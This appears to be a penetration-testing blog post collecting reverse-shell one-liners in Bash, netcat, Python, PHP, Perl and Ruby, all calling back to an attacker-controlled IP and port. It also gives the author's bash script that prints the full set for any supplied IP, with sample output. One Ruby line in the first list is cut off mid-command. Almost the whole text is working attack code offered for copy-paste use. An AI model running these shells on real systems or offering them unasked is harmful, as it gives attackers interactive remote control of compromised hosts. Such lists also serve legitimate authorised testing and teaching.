Reverse Shells

Some very common methods for reverse shells are found on pentestmonkey.net. I’ll be using some of these in this post.

Common Reverse Shells

Bash

bash -i >& /dev/tcp/10.0.0.1/1337 0>&1

Netcat

If netcat supports the -e option:

nc -e /bin/sh 10.0.0.1 1337

If netcat does not support the -e option:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1337 >/tmp/f

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

php -r '$sock=fsockopen("10.0.0.1",1337);exec("/bin/sh -i <&3 >&3 2>&3");'

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1337).to_i;exec sprintf("/bin/sh -i <&%d

I always go to the pentest monkey site to look them up, but that takes some time. I wrote a quick shell script that takes in an ip and spits out a list of shells

#!/bin/bash

# author kegn
# simple shell script that just makes easy copy-paste shells for testing
# shells from pentestmonkey

# usage: ./shellmaker <local ip>

lip=$1

printshells() {

echo -e "\e[32m[*] Netcat Shell\e[0m"
echo "nc -e /bin/sh $lip 1337"
echo ""

echo -e "\e[32m[*] Netcat Shell (no -e)\e[0m"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $lip 1337 >/tmp/f"
echo ""

echo -e "\e[32m[*] Bash Shell\e[0m"
echo "bash -i >& /dev/tcp/$lip/1337 0>&1"
echo ""

echo -e "\e[32m[*] Python Shell\e[0m"
echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"$lip\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
echo ""

echo -e "\e[32m[*] PHP Shell\e[0m"
echo "php -r '\$sock=fsockopen(\"$lip\",1337);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
echo ""

echo -e "\e[32m[*] Perl Shell\e[0m"
echo "perl -e 'use Socket;\$i=\"$lip\";\$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in(\$p,inet_aton(\$i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'"
echo ""

echo -e "\e[32m[*] Ruby Shell\e[0m"
echo "ruby -rsocket -e'f=TCPSocket.open(\"$lip\",1337).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"
echo ""

}


# run main
printshells

Script output:

[root@kadi pentest-tools]# ./shell-maker.sh 10.10.10.10
[*] Netcat Shell
nc -e /bin/sh 10.10.10.10 1337

[*] Netcat Shell (no -e)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1337 >/tmp/f

[*] Bash Shell
bash -i >& /dev/tcp/10.10.10.10/1337 0>&1

[*] Python Shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

[*] PHP Shell
php -r '$sock=fsockopen("10.10.10.10",1337);exec("/bin/sh -i <&3 >&3 2>&3");'

[*] Perl Shell
perl -e 'use Socket;$i="10.10.10.10";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

[*] Ruby Shell
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",1337).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'